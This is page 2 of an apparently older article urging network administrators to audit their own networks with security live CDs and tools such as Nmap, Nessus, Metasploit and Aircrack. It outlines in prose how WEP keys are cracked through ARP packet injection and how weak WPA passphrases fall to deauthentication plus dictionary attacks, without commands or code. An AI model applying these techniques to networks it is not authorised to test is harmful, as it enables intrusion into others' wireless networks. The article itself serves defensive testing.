Bad-Guy Tools for Good Guys - page 2
When You Have to Make an Omelette...
So where do you start? The first thing to do is to choose an .iso to download, and the truth is you should probably try two or three: each one is targeted at a slightly different user, although there is a great deal of overlap in the tools that are included with them. Some of the more popular ones include Backtrack, STD (security tool distribution) and nUbuntu.
Once you've booted into one of these distributions, the next thing to do is to familiarize yourself with some of the apps that are included, and get to work. There are usually plenty of old favorites like Wireshark (the network protocol analyzer formerly known as Ethereal) and, if you've not already come across them before, some that may cause your eyebrows to be raised, including Nmap, Nessus, Metasploit, and Aircrack, and its newer incarnation, Aircrack-ng.
Nmap is a powerful network mapper which can scan even very large corporate networks to see what hosts are connected and what services they are offering, and can also scan for unauthorized servers. It's worth seeing what you--and anyone else using it on your network--could find out by giving it a spin.
Nessus is a portscanner which can also run exploits on open ports, and can even try to crash vulnerable machines. While you may not want to do that--and in fact a switch can disable this option--this can be useful in a test environment before a machine is deployed.
Metasploit is a much more sinister matter altogether. Essentially it's a point and click hacking tool--choose the platform or application you want to attack, choose from a list of exploits, and launch an attacks. With a friendly Web interface it's primarily aimed at script kiddies, but the point to bear in mind is that if anyone can launch these exploits, they probably will, so you might as well see if they are successful before someone else does.
Aircrack/Aircrack-ng is interesting because although everyone knows--or should know--that WEP is totally insecure, it's often assumed that though that's true in theory, in practice it's probably quite time consuming to crack it. By running the Aircrack suite you can see for yourself that in fact it's trivial to discover a WEP "protected" wireless network and get your hands on the WEP key from a single laptop. By using packet injection to simulate ARP requests, you can generate huge volumes of packets from the access point even when legitimate users are relatively idle, thereby capturing enough of the vulnerable initialization vectors attached to each packet to crack the key in as little as 15 minutes. And remember, if you've got an access point running in mixed WEP and WPA mode to accommodate users with older Wi-Fi equipment that doesn't support WPA then that's just as vulnerable as one running only WEP.
The Aircrack toolset can also be used to crack WPA passwords, but since this relies on a combination of deauthorization (deauth) and offline dictionary attacks, it will only work if the password is sufficiently weak. So armed with a suitably large dictionary, you can at least use this to satisfy yourself that if you are using a simple RC4 cipher-based WPA shared key approach (which you probably shouldn't--you should be using WPA-Enterprise, or WPA with Radius authentication) that your passphrase is suitably secure. Ideally that means a random string of 63 characters--which is uncrackable in any sensible period of time.
The list of security--or should that be hacker--tools included on these CDs is almost endless--certainly too long to list here. But the point is they are out there, they are powerful, and they can do your network serious harm. They are also free and freely available, and they are not going away. In these circumstances it does seem like the only sensible response is to try them out for yourself and close any vulnerabilities they expose. It won't guarantee your network's security, but it will make sure that anyone who wants to break in to your network is going to have to work hard a little bit harder if they want to succeed.